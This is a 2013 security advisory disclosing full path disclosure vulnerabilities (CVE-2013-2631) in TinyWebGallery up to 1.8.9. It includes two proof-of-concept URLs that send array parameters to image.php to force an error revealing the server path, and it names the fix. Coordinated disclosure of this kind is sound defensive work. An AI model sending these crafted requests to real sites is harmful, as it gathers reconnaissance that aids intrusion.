============================================= INTERNET SECURITY AUDITORS ALERT 2013-012 - Original release date: March 19th, 2013 - Last revised: April 6th, 2013 - Discovered by: Manuel Garcia Cardenas - Severity: 5/10 (CVSS Base Score) - CVE-ID: CVE-2013-2631 ============================================= I. VULNERABILITY ------------------------- Multiple Full Path Disclosure Vulnerabilities in TinyWebGallery <= v1.8.9 II. BACKGROUND ------------------------- TinyWebGallery (TWG) is a photo album / gallery released under a modified Open Source license GPL. It is a server based gallery script for images which uses Ajax, PHP, XML and the graphic library Gdlib / ImageMagick. III. DESCRIPTION ------------------------- This vulnerability could allow a malicious user to view the internal path information of the host due to some files were missing the check the inclusion of libraries. The error is generated through the parameters "twg_browserx" and "twg_browsery" in the page image.php. IV. PROOF OF CONCEPT ------------------------- The attacker can get the full path of the installation of TinyWebGallery browsing to any of this urls: http://vulnerablesite.com/tw/image.php?fontscale=1&twg_browserx[]=1706&twg_browsery=890&twg_xmlhttp=r http://vulnerablesite.com/tw/image.php?fontscale=1&twg_browserx=1706&twg_browsery[]=890&twg_xmlhttp=r The information obtained contains the full path to the files: Fatal error: Unsupported operand types in /var/www/tw/inc/ajaxserver.inc.php on line 157 V. BUSINESS IMPACT ------------------------- Full path disclosure vulnerabilities enables an attacker to know the path to the web root. This information can be used in order to launch further attacks. VI. SYSTEMS AFFECTED ------------------------- TinyWebGallery <=1.8.9 VII. SOLUTION ------------------------- Update to version 1.9 VIII. REFERENCES ------------------------- http://www.tinywebgallery.com http://www.isecauditors.com IX. CREDITS ------------------------- This vulnerability has been discovered by Manuel Garcia Cardenas (mgarcia (at) isecauditors (dot) com). X. REVISION HISTORY ------------------------ March 19, 2013: Initial release. April 6, 2013: Final release. XI. DISCLOSURE TIMELINE ------------------------- March 19, 2013: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com) March 21, 2013: Send to Vendor. March 21, 2013: New version that includes patched code. April 6, 2013: Sent to lists. XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information. XIII. ABOUT ------------------------- Internet Security Auditors is a Spain based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us. XIV. FOLLOW US ------------------------- You can follow Internet Security Auditors, news and security advisories at: https://www.facebook.com/ISecAuditors https://twitter.com/ISecAuditors http://www.linkedin.com/company/internet-security-auditors http://www.youtube.com/user/ISecAuditors